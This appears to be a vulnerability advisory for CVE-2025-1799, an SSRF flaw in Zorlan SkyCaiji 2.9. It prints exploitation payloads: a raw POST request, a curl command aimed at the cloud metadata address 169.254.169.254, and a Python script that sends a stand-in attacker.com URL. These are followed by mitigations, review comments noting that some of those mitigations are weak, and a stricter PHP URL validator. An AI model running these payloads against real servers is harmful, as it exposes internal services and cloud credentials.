How CVE-2025-1799 Works
The vulnerability in Zorlan SkyCaiji 2.9 arises from improper input validation in the `previewAction` function in vendor/skycaiji/app/admin/controller/Tool.php. An attacker can supply an arbitrary URL in the `data` parameter to perform Server-Side Request Forgery (SSRF), forcing the server to make unauthorized HTTP requests to internal or external systems. The root cause is insufficient sanitization of the user-supplied URL, which lets an attacker bypass network access controls, interact with backend services, exfiltrate data, or pivot further into internal networks. The flaw is remotely exploitable with low complexity and requires only a low-privileged account.
DailyCVE Form
Platform: Zorlan SkyCaiji
Version: 2.9
Vulnerability: SSRF
Severity: Critical
Date: 06/12/2025
Prediction: Patch by 07/15/2025
What Undercode Says:
Exploitation
1. Craft malicious payload:
POST /admin/tool/previewAction HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

data=http://internal-service/admin/export
2. Exploit via cURL:
curl -X POST "http://target.com/admin/tool/previewAction" -d "data=http://169.254.169.254/latest/meta-data"
3. Python SSRF script:
import requests

url = "http://target.com/admin/tool/previewAction"
payload = {"data": "http://attacker.com/exfil"}
requests.post(url, data=payload)
Protection
1. Input validation:
// Checks only the scheme and the leading host characters; it still accepts
// http://169.254.169.254/... and http://internal-service/..., so it must be
// paired with a host allowlist or a resolved-address check (see item 3).
if (!preg_match('/^https?:\/\/[a-z0-9.-]+/', $data)) {
    die("Invalid URL");
}
2. Network hardening:
iptables -A OUTPUT -d 169.254.169.254 -j DROP
3. Patch mitigation:
- $url = $_POST['data']; + $url = filter_var($_POST['data'], FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED);
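Review bot: the `+` line does not close the SSRF: FILTER_VALIDATE_URL only checks URL syntax, so http://169.254.169.254/latest/meta-data and http://internal-service/admin/export both pass unchanged; the fix needs a host allowlist, or resolution of the host followed by a check against loopback, link-local and private ranges, before any request is issued. Two smaller points: FILTER_FLAG_SCHEME_REQUIRED has been deprecated since PHP 7.3 because FILTER_VALIDATE_URL always requires a scheme, so the flag only emits a deprecation notice, and the filter does not restrict the scheme to http/https, which should be enforced separately.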
4. Log monitoring:
grep "previewAction" /var/log/nginx/access.log | grep -v "allowed-domain.com"
5. WAF rule:
location /admin/tool {
    # $args only covers the query string; the POST body used by this
    # vulnerability is not inspected by this rule, so a body-aware WAF is needed.
    if ($args ~ "data=http://(internal|169.254)") {
        return 403;
    }
}
6. Disable function:
// Comment or remove previewAction in Tool.php
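Items 1 and 3 above only validate URL syntax. The following is an added example, not SkyCaiji's own code, of the stricter check a previewAction-style handler could apply to the `data` value before fetching it: scheme restricted to http/https, host on an explicit allowlist, and every resolved address checked against loopback, link-local, private and reserved ranges. The function name, the allowlist and the hostnames are assumed.

```php
<?php
// Added example (not SkyCaiji's code). Returns the URL if it may be fetched,
// or null if it must be rejected. The function name and allowlist are assumed.
function validate_preview_url(string $data, array $allowed_hosts): ?string
{
    $parts = parse_url($data);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                      // malformed or scheme/host missing
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                      // refuses file://, gopher://, ftp://, ...
    }
    $host = strtolower($parts['host']);
    if (!in_array($host, $allowed_hosts, true)) {
        return null;                      // deny by default: IP literals such as
    }                                     // 169.254.169.254 are never on the list
    // Resolve every A and AAAA record; one internal address rejects the URL,
    // so a DNS name that points at a metadata or loopback address is refused.
    $ipv4 = gethostbynamel($host) ?: [];
    $aaaa = dns_get_record($host, DNS_AAAA) ?: [];
    $ipv6 = array_column($aaaa, 'ipv6');
    $addresses = array_merge($ipv4, $ipv6);
    if ($addresses === []) {
        return null;                      // unresolvable host
    }
    foreach ($addresses as $ip) {
        // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16, fc00::/7
        // NO_RES_RANGE:  127/8, 169.254/16, 0/8, 240/4, ::1, fe80::/10, ...
        $ok = filter_var($ip, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
        if ($ok === false) {
            return null;
        }
    }
    return $data;
}

// Constructed allowlist for illustration; the application would load its own.
$allowed = ['feeds.example.com'];
$url = validate_preview_url($_POST['data'] ?? '', $allowed);
if ($url === null) {
    http_response_code(400);
    exit('Invalid URL');
}
// ... proceed to fetch $url ...
```

The resolution happens at check time, so the fetching code should connect to the address that was validated rather than resolving the name a second time.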
Sources:
Reported By: nvd.nist.gov